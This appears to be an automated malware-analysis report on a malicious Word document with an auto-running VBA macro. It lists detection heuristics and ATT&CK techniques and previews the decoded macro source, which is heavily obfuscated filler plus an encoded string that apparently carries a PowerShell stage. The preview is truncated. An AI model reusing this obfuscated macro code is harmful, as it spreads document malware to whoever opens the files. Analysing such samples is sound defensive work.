MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains VBA macros, specifically an AutoOpen macro. The presence of a GetObject call within the VBA p-code suggests an attempt to execute code, likely to download and run a second-stage payload. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.
Heuristics 6
-
ClamAV: Doc.Malware.Droo-6896835-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Droo-6896835-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60289 bytes |
SHA-256: 1d105597f7e784cb68577ec72fa5622ceae4f1b9f9796e020640ba6bbdaa6f01 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BQxQAZAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lDUAAAoA"
Function z1AC4_A()
If kCDwBk = KAQQUZ Then
XAwcCCA = 807140381 * TD1AXAA4
nAQA1DD = tQocAAX / 633834143 / 37006607 + 239929723 * 754512655 / 871966521 + (oACCAcA4 - Tan(do11ZG + 855296266 - 577802744 - Oct(jAZUZkc - Hex(788374768) + 890738880 + Oct(349146867))) + (477289878 / Sqr(579910016)))
ncAkAUD = 277580615 * WAAAkDU
End If
If iAUAAoBA = pZ4oZ1 Then
BBoUQAk = 508592674 * ixZ1DZo
WAAAZAD = s4Uko_ / 625922695 / 63763153 + 30750925 * 948672253 / 976040757 + (GQkAoU - Tan(EcAQAA + 220458743 - 51280665 - Oct(UAAA_A - Hex(545446455) + 148057455 + Oct(11176011))) + (674452369 / Sqr(311294999)))
jCwxAGwQ = 673436255 * o4ZABA
End If
If iBUABAZ = lBZAxA Then
sUA4wA = 364649697 * QUUkAAAA
NccAAx = zBDQCA / 164862735 / 797063330 + 825739780 * 911211470 / 917698242 + (BQBDDA - Tan(boQBAA1 + 872297686 - 66724995 - Oct(QZDUDQA - Hex(384780563) + 944842147 + Oct(519499904))) + (208935311 / Sqr(738535774)))
EA_kwA = 208128765 * YcAcoABA
End If
If zAAAZDA = sUkDZA Then
uX4AUQ = 534212628 * hwDAQG
aoBUA1D = OAZAAUZ / 57189296 / 32101116 + 569520364 * 297760706 / 931064337 + (KxwAwCoD - Tan(tcXCU_oA + 865955269 - 63009569 - Oct(UkwQBDZ - Hex(105530356) + 844234208 + Oct(565702656))) + (267762147 / Sqr(912056685)))
LBkBQCAQ = 295431747 * bABGAAX
End If
If uCAAAA = pCZAAA Then
hkAUZA = 451088644 * rAQDQ4A
J_AAowA = HAAXDUA / 278163905 / 194579321 + 191353584 * 212533361 / 544317322 + (hwADowx - Tan(XDADkAww + 944129522 - 310343675 - Oct(M_ACUA - Hex(509784722) + 418391608 + Oct(623713806))) + (678751379 / Sqr(903281591)))
ND_Boc_A = 76635001 * ixQCCcAw
End If
If ucDkUC = SQAAxAk Then
WABkAAAQ = 461516306 * BwQoA4
SAwx_A_4 = tBAU__cA / 123512461 / 822377604 + 552203938 * 364946267 / 321865355 + (HDAxA4 - Tan(UQAwADZ + 615469506 - 813429054 - Oct(icwAA1oo - Hex(472650998) + 610244657 + Oct(155235874))) + (988403145 / Sqr(942477152)))
RAA4ADAD = 671427848 * NBDAwA
End If
End Function
Function R1AoXcU()
On Error Resume Next
If ZZGCk1 = JDD__AA Then
woZ4o4wU = 521969686 * QAUBAAU4
u_AAGCU = sAZAcwUA / 606752164 / 880632365 + 442418111 * 544390013 / 604209456 + (GkcZQA - Tan(KADABXX + 655868125 - 527487444 - Oct(OUAAUAwD - Hex(92131595) + 728374417 + Oct(524104891))) + (990784962 / Sqr(287209824)))
PQcXBA_ = 612878388 * uAo_UwAw
End If
If NUXA4UA = OBZAZZ Then
TAkUAD = 157424435 * zAAkwA
rAA1AA1 = WAoAoB_B / 494891308 / 328545142 + 592800891 * 215982215 / 338932341 + (TQACAc - Tan(JAADoAAA + 843099940 - 990622244 - Oct(F_wD_Q1 - Hex(722506656) + 325570329 + Oct(733723383))) + (405494320 / Sqr(506348481)))
vDADAxU = 139631113 * L_4CAX
End If
If NACBAZx = bwAAxA Then
AABABoc = 680879815 * nAA4Zx
mBG_CU = zCcXAU / 245224203 / 968817610 + 43839049 * 401417920 / 548907961 + (TcAZ1A1Q - Tan(B4CUZUBA + 138840255 - 547002862 - Oct(AUAADQ_B - Hex(111856662) + 464260225 + Oct(80207357))) + (372202813 / Sqr(350495293)))
wA_AUAw = 953983284 * kAA_DUBA
End If
QwBoAA1 = "IAAmACAAKAAgACQAVgBlAFIAQgBvAFMAZQBwAFIAZQBGAGUAcgBFAE4AQwBlAC4AdABPAFMAVABSAGkA"
If PkQADAUC = SQCoUA Then
ECAUUw = 346384682 * IQoQQG
XDAUUA = CAA_AA / 152765075 / 745169039 + 354184191 * 747794806 / 56014307 + (VQAAoQU - Tan(qDAGAGD + 615466887 - 671128934 - Oct(VAAABA - Hex(904113250) + 396352631 + Oct(147568243))) + (428728107 / Sqr(800175746)))
fAB4DQ = 918030212 * h4AABxZ
End If
If iAAAAAZ = JoAAkAx Then
CAwDCAAD = 275221804 * fUBBUAQ
OQxAZDC = uwxGAxU / 144038732 / 306093381 + 124742707 * 731845568 / 69384276 + (KAcZADUD - Tan(ZGZAABo + 229036077 - 149838956 - Oct(EDC_QAB
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.